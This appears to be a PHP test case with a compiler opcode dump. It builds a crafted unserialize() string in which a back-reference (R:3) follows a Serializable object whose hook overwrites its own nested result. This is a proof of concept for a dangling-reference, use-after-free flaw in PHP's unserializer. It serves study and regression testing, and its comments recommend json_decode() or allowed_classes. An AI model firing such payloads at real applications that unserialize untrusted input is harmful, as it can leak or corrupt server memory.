<?php // Test case: an outer unserialize() payload whose R: back-reference follows a Serializable object (C:) entry.
class obj implements Serializable
{
    private $data; // set from the nested payload, then replaced by int 3 inside unserialize()
    // Returns the serialized form of $data. Nothing in this script calls it.
    public function serialize()
    {
        return serialize($this->data);
    }
    // Invoked by the outer unserialize() for the C:3:"obj" entry; $data is the text between that entry's braces.
    public function unserialize($data)
    {
        $this->data = unserialize($data); // nested decode, runs while the outer unserialize() is still in progress
        $this->data = 3;                  // overwrite: the property stops referencing the value decoded just above
    }
}
// Payload shape: a:2:{ i:0 => C:3:"obj":<len>:{<inner>} ; i:1 => R:3 }. Layout keeps the opcode dump's `line` numbers.
$inner = 'a:0:{}'; // serialized empty array, handed to obj::unserialize() as $data
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}'; // R:3 = reference to the 3rd decoded value
// NOTE(review): slot 3 presumably names the value made by the nested decode, which obj has already replaced - confirm per version.
$data = unserialize($exploit);
// $v is never read; presumably these new strings exist to make a dangling reference visible in the dump - TODO confirm.
for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi' . $i;
}
// Review note: unserialize() on untrusted bytes reaches hooks like obj::unserialize(); use json_decode() or allowed_classes => false.
var_dump($data); // element 1 is the R: target; it should never show the 'hiN' strings or other unrelated memory
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
Branch analysis from position: 14
filename:       /in/BclOC
function name:  (null)
number of ops:  24
compiled vars:  !0 = $inner, !1 = $exploit, !2 = $data, !3 = $i, !4 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   DECLARE_CLASS                                            'obj'
   18     1        ASSIGN                                                   !0, 'a%3A0%3A%7B%7D'
   19     2        STRLEN                                           ~6      !0
          3        CONCAT                                           ~7      'a%3A2%3A%7Bi%3A0%3BC%3A3%3A%22obj%22%3A', ~6
          4        CONCAT                                           ~8      ~7, '%3A%7B'
          5        CONCAT                                           ~9      ~8, !0
          6        CONCAT                                           ~10     ~9, '%7Di%3A1%3BR%3A3%3B%7D'
          7        ASSIGN                                                   !1, ~10
   21     8        INIT_FCALL                                               'unserialize'
          9        SEND_VAR                                                 !1
         10        DO_ICALL                                         $12     
         11        ASSIGN                                                   !2, $12
   23    12        ASSIGN                                                   !3, 0
         13      > JMP                                                      ->18
   24    14    >   CONCAT                                           ~16     'hi', !3
         15        ASSIGN_DIM                                               !4, !3
         16        OP_DATA                                                  ~16
   23    17        PRE_INC                                                  !3
         18    >   IS_SMALLER                                               !3, 5
         19      > JMPNZ                                                    ~18, ->14
   27    20    >   INIT_FCALL                                               'var_dump'
         21        SEND_VAR                                                 !2
         22        DO_ICALL                                                 
         23      > RETURN                                                   1

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BclOC
function name:  serialize
number of ops:  6
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E >   INIT_FCALL                                               'serialize'
          1        FETCH_OBJ_R                                      ~0      'data'
          2        SEND_VAL                                                 ~0
          3        DO_ICALL                                         $1      
          4      > RETURN                                                   $1
    9     5*     > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BclOC
function name:  unserialize
number of ops:  9
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   11     0  E >   RECV                                             !0      
   13     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   14     6        ASSIGN_OBJ                                               'data'
          7        OP_DATA                                                  3
   15     8      > RETURN                                                   null

End of function unserialize

End of class obj.

Generated using Vulcan Logic Dumper, using php 8.0.0

